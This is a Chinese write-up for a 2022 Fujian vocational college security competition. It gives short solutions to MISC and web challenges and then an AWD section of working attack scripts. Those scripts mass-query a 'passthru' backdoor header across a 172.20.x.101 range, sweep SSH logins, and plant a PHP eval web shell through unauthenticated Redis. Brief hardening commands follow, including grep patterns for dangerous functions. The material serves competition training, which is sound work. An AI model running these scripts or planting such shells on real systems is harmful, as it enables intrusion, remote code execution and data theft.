2022福建省职业院校技能大赛信息安全管理与评估WP
MISC
1. Utf-7解密
win7中utf-7工具解密
2. Wireshark分析
筛选http请求包,追踪流
3. wireshark文件导出
导出对象>>>http
4. png文件头补全
winhex打开文件,修改文件头89504E47为png文件头,打开图片得flag 504E47
5. 压缩包伪加密
更改文件名为rar压缩包。 用winhex打开 修改为加密位0009 为0000得到key.txt文件 59B0---6
WEB1
1. you are not admin
ctf=php://input post写the user is admin
2. 文件上传php黑名单上传phP,大小写绕过限制
3. rebots.txt
访问这个文件得到flag
4. 爆破登陆6位数数字
burp爆破密码6位数。 423987 得到的值为加密值
5.未提供
WEB2
1. hello=welcome
页面源码看参数,cookie写入administrator. 我可以是administrator
2. md5若类型比较
name[]=1 post写入. password[]=2&id=admin
name=QNKCDZO post: password=240610708&id=admin
3. vim的swo文件
.index.php.swo文件下载得到flag
4. 全局变量绕过
GLOBALS
5. 源码base64
页面源码中携带base64
where is flag锛
include('flag.php');
$unserialize_str = $_POST['data'];
$data_unserialize = unserialize($unserialize_str);
if($data_unserialize['user'] == '???' && $data_unserialize['pass']=='???')
{ print_r($flag); }
<?php
$a = array('user'=>1,'pass'=>1);
$b = serialize($a);
print($b);
?>
a:2:{s:4:"user";i:1;s:4:"pass";i:1;}
a:2:{s:4:"user";b:1;s:4:"pass";b:1;}
# 两个键值 user = 1 pass=1 s:num对应长度 b表示布尔 i表示--
AWD
root dcndcndcn
dcn dcn
数据库:root:Dcnflag.123
redis未授权
--protected-mode no
/inc/config.php 全局。 post请求根目录/ 请求头:Command: passthru('cat /flag');
conn.php 全局 post请求 base64加密后的值 cat /flag base64编码
文件上传。 uploadimg_form.php
gif89a. image/jpeg. 文件.php
name='G_fu_image[]'
#conn命令执行
import requests
import threading,re,time
def find_flag(text):
res = re.findall(r'flag{.*?}', text)
return res[0]
def conn(url):
data = 'Y2F0IC9mbGFn'
head = {"Command":"passthru('cat /flag');"}
try:
req = requests.post(url=url,data=data,headers=head)
print(url, find_flag(req.text))
except Exception as e:
print(url, e)
for i in range(101,121):
url = 'http://172.20.{}.101/'.format(i)
while 1:
threading.Thread(target=conn,args=(url,)).start()
time.sleep(0.1)
#ssh连接脚本
import paramiko
import threading
def ssh_con(host):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(hostname=host,username='root',password='a',timeout=20)
stdin,stout,stin = ssh.exec_command('whoami')
flag = stout.read().decode()
print(host, flag)
except Exception as e:
print('[-]',host,e)
for i in range(1,10):
host = '10.211.55.{}'.format(i)
threading.Thread(target=ssh_con,args=(host,)).start()
#redis未授权写马
import socket
import threading
def redis_conn(ip):
s = socket.socket()
try:
s.connect((ip,'6379'))
cmd = "config set dir /var/www/html/\n config set dbfilename con.php\n set con.php \"<?php @eval($_GET[1]);?>\"\n save\n".encode('utf-8')
s.sendall(cmd)
f = s.recv(1024)
print(ip,f.decode('utf-8'))
except Exception as e:
print('[-]',ip)
for i in range(101,123):
ip = '172.20.{}.101'.format(i)
threading.Thread(target=redis_conn,args=(ip,)).start()
加固:
系统层:
root改密码MyTeam...
awk -F: '/bash$/{print $1}' /etc/passwd 看不是nologin的用户
netstat -tunlp >>>kill -9 删除端口
cat /etc/rc.local 开机启动任务
cat /etc/crontab 计划任务
pkill -kill -t pts/1
tty1:代表本地登录
pts/x: 代表ssh远程登录功能
echo user:pass |chpasswd
echo newpass|passwd --stdin username
数据库:
mysqladmin -uroot -proot password '新密码'
mysql -u root -h127.0.0.1 -p 登陆数据库
- select * from users; 查看所有用户
- 看表中host值为%,删除 delete from user where user='root' and host='%';
- set password for '用户'@'地址'=password('新密码');
- flush privileges; service mysql restart 保存、重启数据库
web层:
find ./ -name '*.php' | xargs grep -n 'eval' 查找文件中关键函数(shell_exec、passthru、system、assert)
find ./ -name '*.php'|xargs grep -n -E "eval|passthru|exec|shell" 多参数查询
-
修改函数加固,限制上传文件
-
网站目录权限 chmod -R 000 /var/www/html